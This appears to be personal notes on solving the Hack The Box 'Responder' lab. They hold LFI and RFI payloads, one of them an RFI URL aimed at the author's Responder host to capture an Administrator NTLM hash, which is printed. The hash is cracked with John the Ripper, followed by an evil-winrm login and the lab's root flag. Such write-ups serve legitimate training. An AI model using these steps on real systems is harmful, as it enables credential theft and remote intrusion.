Respond

Target Information:

  • IP: 10.129.113.205
  • TCP Port 80: Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

==============================================================

Task #1: When visiting the web service using the IP address, what is the domain that we are being redirected to?

  • A: unika.htb
  • To visit:
    • Edit /etc/hosts to include 10.129.113.205 unika.htb
    • This allows us to access a custom TLD

Task #2: Which scripting language is being used on the server to generate webpages?

  • A: PHP

  • nmap 10.129.113.205 -sC -sV -T4 -Pn -p-

    $ nmap 10.129.113.205 -sC -sV -T4 -Pn -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 14:46 EST
    Nmap scan report for unika.htb (10.129.113.205)
    Host is up (0.11s latency).
    Not shown: 65532 filtered ports
    PORT     STATE SERVICE    VERSION
    80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
    |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
    |_http-title: Unika
    5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    7680/tcp open  pando-pub?
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    

Task #3: What is the name of the URL parameter which is used to load different language versions of the webpage?

Task #4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Task #5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

  • A: //10.10.14.6/somefile

Task #6: What does NTLM stand for?

  • A: New Technology LAN Manager

Task #7: Which flag do we use in the Responder utility to specify the network interface?

  • A: -I
  • https://www.kali.org/tools/responder/
    • sudo git clone https://github.com/lgandx/Responder /opt/Responder
    • Add alias responder="python3 /opt/Responder/Responder.py" in ~/.bashrc, then source
    • pip3 install netifaces
    • sudo python3 /opt/Responder/Responder.py -I tun0
      • TODO: RESEARCH WHAT tun0 IS!

Task #8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

  • A: john the ripper

Task #9: What is the password for the administrator user?

  • A:

  • Use remote file inclusion from the Responder server IP:

    • Make sure responder is still running

    • Visit "http://unika.htb/index.php?page=//10.10.16.143/anything", which will capture the NTLM hash

      Administrator::RESPONDER:63ff936b9fdc75cb:DBE9D33020961DEF69B126BD7CE26720:01010000000000008034D7BB000FD9011E353DFAF6081B2A00000000020008005A004D005000500001001E00570049004E002D005100390052005A0034005500510043005A005100470004003400570049004E002D005100390052005A0034005500510043005A00510047002E005A004D00500050002E004C004F00430041004C00030014005A004D00500050002E004C004F00430041004C00050014005A004D00500050002E004C004F00430041004C00070008008034D7BB000FD901060004000200000008003000300000000000000001000000002000001465C479D5A200159384C019FB8E6AEE1BF77C342485E468A68AF6E605CA90440A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100340033000000000000000000
      
  • john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt !> badminton

Task #10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

  • A: 5985
  • Info from the nmap scan from earlier; service is WimRM (source)
  • Can exploit with evil-winrm
    • sudo apt install ruby rbenv ruby-dev
    • gem install evil-winrm

Submit root flag: ea81b7afddd03efaa0945333ed147fac

  • evil-winrm -u Administrator -p 'badminton' -i 10.129.113.205
  • cat C:/Users/mike/Desktop/flag.txt

Tags

  1. very easy (Private)
  2. WimRM (Private)
  3. web (Private)
  4. responder (Private)
  5. LFI (Private)
  6. RFI (Private)
  7. RCE (Private)